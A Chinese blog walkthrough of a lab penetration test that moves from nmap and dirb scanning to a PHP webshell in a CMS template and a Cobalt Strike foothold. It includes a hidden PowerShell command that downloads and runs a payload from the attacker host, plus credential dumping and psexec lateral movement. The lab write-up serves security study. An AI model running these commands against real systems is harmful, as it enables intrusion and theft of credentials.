简单的内网渗透实验

目录

实验所需:

 简单的网络拓扑

确认实验环境

 信息收集

 上传一句话木马

 蚁剑连接

域渗透

生成监听器

 生成上线指令

蚁剑执行

 主机发现

 域内信息收集

 建立smb隧道

本文仅供于学习探讨 


实验所需:

kali一台,NAT模式。

Win7一台,两张网卡,一张NAT,一张内网。

Win2k3一台,NAT模式。

Win2k8一台,NAT模式。

 简单的网络拓扑

确认实验环境

确认实验环境是否可以正常进行实验 

Win7:192.168.3.128为内网环境,192.168.40.154则为NAT(外网)环境。

 Win2k8

 Win2k3

 信息收集

通过各种方法搜集到IP,对其进行一个扫描

sudo nmap -A -p- -sC -Pn -T4 192.168.40.154 -oN namp.A

可以看到这个靶机开放了很多端口,很多方法都可以拿下,这里就不在详细赘述。

对其80端口进行一个爆破

dirb http://192.168.40.154

 发现yxcms和phpmyadmin

对yxcms进行访问

对网站进行一个浏览

 

在首页下滑很容易就发现了重要信息

 登录网站后台

通过在公告获得的信息得知的后台登录的网址以及账密

 上传一句话木马

前台模板----管理模板文件 这里可以编辑php文件,

 对404.php页面进行写入一句话木马

 保存之后可以使用一句话木马来连接,但不知道网站的绝对路径,我们可以上搜索引擎上看一下。

http://192.168.40.154/yxcms/protected/apps/default/view/default/

 蚁剑连接

域渗透

 cobaltStrike

sudo ./teamserver 192.168.40.140 123456

./start.sh

生成监听器

Cobalt Strike ---- Listeners ---add

 生成上线指令

Attacks----Web Drive-by----Scripted Web Delivery

Listener一栏选择刚刚创建的监听器。

记录好生成的指令

蚁剑执行

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.40.140:80/a'))"

执行命令之后稍等一段时间,主机上线。

 主机发现

域内主机存活和端口扫描 

右键上线的主机----Explore----port scan

 

 注意Listeners选择

 view----targets   可以查看结果

 域内信息收集

在下方命令行进行

 beacon> hashdump

 beacon> logonpasswords

直接显示明文密码 

 建立smb隧道

Cobalt Strike----Listeners----add

在targets中   右键IP----Jump----psexec

进行配置

 上线成功

 同样的方法上线另一台主机

 完成。

本文仅供于学习探讨 

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值